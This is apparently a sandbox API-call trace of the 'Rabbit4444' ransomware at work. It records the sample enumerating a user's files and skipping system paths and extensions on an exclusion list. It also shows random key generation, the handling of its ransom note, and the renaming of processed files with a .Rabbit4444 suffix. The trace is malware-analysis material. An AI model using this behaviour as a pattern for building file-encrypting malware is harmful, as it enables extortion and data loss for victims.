lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.586] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe9dbc444, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.586] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.586] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.586] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.586] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.586] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.586] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9dbc444, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9dbc444, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9dbc444, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.586] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.586] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.586] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe3309105, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xe3309105, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Database", cAlternateFileName="")) returned 1 [0054.586] lstrcmpiW (lpString1="Database", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.586] lstrcmpiW (lpString1="Database", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.586] lstrcmpiW (lpString1="Database", lpString2="Rabbit4444.exe") returned -1 [0054.586] lstrcmpiW (lpString1="Database", lpString2=".") returned 1 [0054.586] lstrcmpiW (lpString1="Database", lpString2="..") returned 1 [0054.586] lstrcmpiW (lpString1="Database", lpString2="windows") returned -1 [0054.586] lstrcmpiW (lpString1="Database", lpString2="bootmgr") returned 1 [0054.586] lstrcmpiW (lpString1="Database", lpString2="pagefile.sys") returned -1 [0054.586] lstrcmpiW (lpString1="Database", lpString2="boot") returned 1 [0054.586] lstrcmpiW (lpString1="Database", lpString2="ids.txt") returned -1 [0054.586] lstrcmpiW (lpString1="Database", lpString2="NTUSER.DAT") returned -1 [0054.586] lstrcpyW (in: lpString1=0x130eb90, lpString2="Database" | out: lpString1="Database") returned="Database" [0054.586] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0054.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6a) returned 0x1178d8 [0054.587] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6530 | out: ListHead=0xf68b0, ListEntry=0xf6530) returned 0xf6510 [0054.587] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe3309105, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xe3309105, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Database", cAlternateFileName="")) returned 0 [0054.587] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0054.587] lstrcpyW (in: lpString1=0x130eb90, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.587] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.589] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.589] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.590] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.590] CloseHandle (hObject=0x278) returned 1 [0054.590] CloseHandle (hObject=0x27c) returned 1 [0054.590] GetCurrentThreadId () returned 0xd98 [0054.590] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6530 [0054.590] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database" [0054.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0054.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6528 | out: hHeap=0xe0000) returned 1 [0054.590] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database" [0054.590] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\" [0054.590] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\.BFC0E91B00AE8A0620D3" [0054.590] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.592] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.594] FlushFileBuffers (hFile=0x27c) returned 1 [0054.595] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.595] CloseHandle (hObject=0x27c) returned 1 [0054.596] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database") returned 52 [0054.596] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.596] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe3309105, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xe9dbc444, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0054.596] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.596] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.596] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.596] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.596] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe3309105, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xe9dbc444, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.596] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.596] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.596] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.596] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.596] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.596] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9dbc444, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9dbc444, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9de26ea, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.596] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.596] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.596] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d1eb87d, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3d1eb87d, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x8d115f6, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EDB.chk", cAlternateFileName="")) returned 1 [0054.596] lstrcmpiW (lpString1="EDB.chk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.596] lstrcmpiW (lpString1="EDB.chk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.596] lstrcmpiW (lpString1="EDB.chk", lpString2="Rabbit4444.exe") returned -1 [0054.596] lstrcmpiW (lpString1="EDB.chk", lpString2=".") returned 1 [0054.596] lstrcmpiW (lpString1="EDB.chk", lpString2="..") returned 1 [0054.596] lstrcmpiW (lpString1="EDB.chk", lpString2="windows") returned -1 [0054.597] lstrcmpiW (lpString1="EDB.chk", lpString2="bootmgr") returned 1 [0054.597] lstrcmpiW (lpString1="EDB.chk", lpString2="pagefile.sys") returned -1 [0054.597] lstrcmpiW (lpString1="EDB.chk", lpString2="boot") returned 1 [0054.597] lstrcmpiW (lpString1="EDB.chk", lpString2="ids.txt") returned -1 [0054.597] lstrcmpiW (lpString1="EDB.chk", lpString2="NTUSER.DAT") returned -1 [0054.597] lstrcpyW (in: lpString1=0x130eba2, lpString2="EDB.chk" | out: lpString1="EDB.chk") returned="EDB.chk" [0054.597] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB.chk", dwFileAttributes=0x0) returned 1 [0054.597] lstrlenW (lpString="EDB.chk") returned 7 [0054.597] lstrlenW (lpString="Rabbit4444") returned 10 [0054.597] lstrcmpiW (lpString1="ꀀ", lpString2="Rabbit4444") returned 1 [0054.597] lstrlenW (lpString=".dll") returned 4 [0054.597] lstrcmpiW (lpString1=".chk", lpString2=".dll") returned -1 [0054.597] lstrlenW (lpString=".lnk") returned 4 [0054.597] lstrcmpiW (lpString1=".chk", lpString2=".lnk") returned -1 [0054.597] lstrlenW (lpString=".ini") returned 4 [0054.597] lstrcmpiW (lpString1=".chk", lpString2=".ini") returned -1 [0054.597] lstrlenW (lpString=".sys") returned 4 [0054.597] lstrcmpiW (lpString1=".chk", lpString2=".sys") returned -1 [0054.597] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB.chk" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edb.chk"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.597] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.597] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14590819677) returned 1 [0054.597] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0054.598] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0054.598] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0054.598] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x298 [0054.599] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0054.600] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101518) returned 1 [0054.601] CryptGenRandom (in: hProv=0x101518, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0054.601] CryptReleaseContext (hProv=0x101518, dwFlags=0x0) returned 1 [0054.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0054.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0054.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0054.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0054.601] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14591217699) returned 1 [0054.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0054.602] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0054.602] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.602] CloseHandle (hObject=0x298) returned 1 [0054.602] CloseHandle (hObject=0x278) returned 1 [0054.602] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB.chk.Rabbit4444") returned 71 [0054.602] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB.chk" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edb.chk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB.chk.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edb.chk.rabbit4444"), dwFlags=0x1) returned 1 [0054.603] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcb6e1300, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x8d115f6, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EDB.log", cAlternateFileName="")) returned 1 [0054.603] lstrcmpiW (lpString1="EDB.log", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.603] lstrcmpiW (lpString1="EDB.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.603] lstrcmpiW (lpString1="EDB.log", lpString2="Rabbit4444.exe") returned -1 [0054.603] lstrcmpiW (lpString1="EDB.log", lpString2=".") returned 1 [0054.603] lstrcmpiW (lpString1="EDB.log", lpString2="..") returned 1 [0054.603] lstrcmpiW (lpString1="EDB.log", lpString2="windows") returned -1 [0054.603] lstrcmpiW (lpString1="EDB.log", lpString2="bootmgr") returned 1 [0054.603] lstrcmpiW (lpString1="EDB.log", lpString2="pagefile.sys") returned -1 [0054.603] lstrcmpiW (lpString1="EDB.log", lpString2="boot") returned 1 [0054.603] lstrcmpiW (lpString1="EDB.log", lpString2="ids.txt") returned -1 [0054.603] lstrcmpiW (lpString1="EDB.log", lpString2="NTUSER.DAT") returned -1 [0054.603] lstrcpyW (in: lpString1=0x130eba2, lpString2="EDB.log" | out: lpString1="EDB.log") returned="EDB.log" [0054.603] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB.log", dwFileAttributes=0x0) returned 1 [0054.604] lstrlenW (lpString="EDB.log") returned 7 [0054.604] lstrlenW (lpString="Rabbit4444") returned 10 [0054.604] lstrcmpiW (lpString1="ꀀ", lpString2="Rabbit4444") returned 1 [0054.604] lstrlenW (lpString=".dll") returned 4 [0054.604] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0054.604] lstrlenW (lpString=".lnk") returned 4 [0054.604] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0054.604] lstrlenW (lpString=".ini") returned 4 [0054.604] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0054.604] lstrlenW (lpString=".sys") returned 4 [0054.604] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0054.604] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edb.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0054.604] GetLastError () returned 0x20 [0054.604] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB.log _CreateFile error 32\r\n") returned 91 [0054.604] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB.log _CreateFile error 32\r\n") returned 91 [0054.604] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.604] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaaf [0054.604] WriteFile (in: hFile=0x278, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x5b, lpOverlapped=0x0) returned 1 [0054.606] CloseHandle (hObject=0x278) returned 1 [0054.606] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0054.606] CloseHandle (hObject=0x0) returned 0 [0054.606] CloseHandle (hObject=0xffffffff) returned 1 [0054.606] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3cffbae0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xe332f20e, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EDB00005.log", cAlternateFileName="")) returned 1 [0054.606] lstrcmpiW (lpString1="EDB00005.log", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.606] lstrcmpiW (lpString1="EDB00005.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.606] lstrcmpiW (lpString1="EDB00005.log", lpString2="Rabbit4444.exe") returned -1 [0054.606] lstrcmpiW (lpString1="EDB00005.log", lpString2=".") returned 1 [0054.606] lstrcmpiW (lpString1="EDB00005.log", lpString2="..") returned 1 [0054.606] lstrcmpiW (lpString1="EDB00005.log", lpString2="windows") returned -1 [0054.607] lstrcmpiW (lpString1="EDB00005.log", lpString2="bootmgr") returned 1 [0054.607] lstrcmpiW (lpString1="EDB00005.log", lpString2="pagefile.sys") returned -1 [0054.607] lstrcmpiW (lpString1="EDB00005.log", lpString2="boot") returned 1 [0054.607] lstrcmpiW (lpString1="EDB00005.log", lpString2="ids.txt") returned -1 [0054.607] lstrcmpiW (lpString1="EDB00005.log", lpString2="NTUSER.DAT") returned -1 [0054.607] lstrcpyW (in: lpString1=0x130eba2, lpString2="EDB00005.log" | out: lpString1="EDB00005.log") returned="EDB00005.log" [0054.607] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log", dwFileAttributes=0x0) returned 1 [0054.607] lstrlenW (lpString="EDB00005.log") returned 12 [0054.607] lstrlenW (lpString="Rabbit4444") returned 10 [0054.607] lstrcmpiW (lpString1="B00005.log", lpString2="Rabbit4444") returned -1 [0054.607] lstrlenW (lpString=".dll") returned 4 [0054.607] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0054.607] lstrlenW (lpString=".lnk") returned 4 [0054.607] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0054.607] lstrlenW (lpString=".ini") returned 4 [0054.607] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0054.607] lstrlenW (lpString=".sys") returned 4 [0054.607] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0054.607] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edb00005.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.607] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.607] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14591819521) returned 1 [0054.607] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2097152) returned 1 [0054.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0054.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0054.608] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x200300, lpName=0x0) returned 0x298 [0054.609] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x300) returned 0x70000 [0054.610] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2c20000 [0054.735] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0054.754] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.754] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0054.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.754] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0054.754] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0054.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0054.754] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14606494361) returned 1 [0054.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0054.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0054.754] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.754] CloseHandle (hObject=0x298) returned 1 [0054.754] CloseHandle (hObject=0x278) returned 1 [0054.755] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log.Rabbit4444") returned 76 [0054.755] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edb00005.log"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edb00005.log.rabbit4444"), dwFlags=0x1) returned 1 